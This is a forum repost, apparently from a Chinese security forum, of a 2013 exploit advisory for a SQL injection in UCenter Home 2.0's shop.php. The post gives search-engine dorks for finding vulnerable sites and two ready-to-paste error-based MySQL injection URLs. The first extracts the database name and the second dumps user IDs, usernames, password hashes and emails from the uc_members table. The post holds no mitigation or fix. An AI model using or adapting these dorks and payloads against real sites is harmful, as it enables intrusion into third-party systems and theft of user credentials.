找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2015|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1 B2 P: R  o- X! x( ]9 `! E
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
/ ]+ G% p) M: ~  ^# j- S+ c3 ^' M. \! K2 z7 e: D" Z" ]
                                 
9 ^' ]5 U- s& M% `' ^2 |! `, ~3 \9 ?2 E9 ]2 i6 q
*/ Author : KnocKout  9 c/ @+ Y% i1 G1 d# `5 l. X3 a2 b2 x
4 O% W7 T" F( p& C0 S/ {( x# e
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
1 Z! d0 U) K/ x8 R# [. r8 e3 n. P. d# c2 l8 G/ r# ?
*/ Contact: knockoutr@msn.com  
/ ~2 r5 M& W6 y  R  ^7 j- U+ z9 W" f
*/ Cyber-Warrior.org/CWKnocKout  
0 T# O' y, p  J( Z4 }7 J* r
+ V. H) p+ x4 F4 w0 T: ?3 F__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  2 p7 L9 Y) N9 o0 o# ^

' }0 ^: O, P- J8 {) {Script : UCenter Home  ( A; u4 [$ x# e

" X; E& B" P2 w$ L2 \+ K( d- R' B& pVersion : 2.0  ' S. M; _9 J# k! q

7 ?/ E( l1 f: G! \+ ^* d% A% hScript HomePage : http://u.discuz.net/  1 q  y' Q7 ]" i- ^2 s
2 H- w8 Z" L9 B9 N1 c( g: Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
8 o% W7 H! k. e' D" ^& W
8 m7 e/ {9 D) ?2 tDork : Powered by UCenter inurl:shop.php?ac=view  
- [0 S8 f  O( _6 T5 @4 ~. S7 ^3 n  ^9 Y  R
Dork 2 : inurl:shop.php?ac=view&shopid=  4 n+ y' P7 [/ s
6 t, |  s# {) C
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  0 e( P' B4 U" T; ?2 A) ^0 G
7 [6 A. z5 S, S! ]2 ^
Vuln file : Shop.php  # f% b0 F# u/ F( a" X
+ W' f8 n& `1 F) Z8 W; }/ @
value's : (?)ac=view&shopid=  2 x. L3 T8 ]' O8 e7 C
* J, i9 I, |$ ?/ h) u2 ~' j
Vulnerable Style : SQL Injection (MySQL Error Based)  
$ [, l" `) V" [2 K6 I: \0 {! m2 k! x. O. E' M" \. s
Need Metarials : Hex Conversion  * t9 q$ _* v8 z8 j$ [5 ]; q

, ^) c  f# [" K: @- a( O0 P% T__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  " y$ _' w, C2 w- J$ j) S9 e
3 u6 r/ O( K5 _% y
Your Need victim Database name.   ; i/ e2 p$ z  l$ E( p9 T' d
* x* S4 x/ k- _' m0 ~+ h/ _
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  , z, [0 {: i1 f! ~/ p
1 V: N5 C: w% Z) m* [
..  7 H4 |. I" S/ Z% M, H1 h
, i' u" X# h) ^% `8 V' N. @7 S
DB : Okey.  
; F. @: P/ H* I  \' D. n% Z' \3 _
your edit DB `[TARGET DB NAME]`  
- ]* i3 j$ Z6 Q" S$ f5 u6 R( s$ ~: p9 \6 y4 t" T
Example : 'hiwir1_ucenter'  
4 q. H1 H' |3 y: Z6 w& M' l
& u) g& N) n! k, O4 D/ |3 h' KEdit : Okey.  # ~+ f( w* d) q
/ T" Z. M# x; d" Q: L; S3 S
Your use Hex conversion. And edit Your SQL Injection Exploit..  
" E; o" e, P) k: A3 {/ R& B4 x8 r* p& |( C1 d% y
   7 w9 {* f5 B5 D0 {* E2 j+ }

4 m9 S: k6 j# X- dExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
) ^$ G3 O2 q2 I- C: D+ @# X0 q" ^) \/ C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表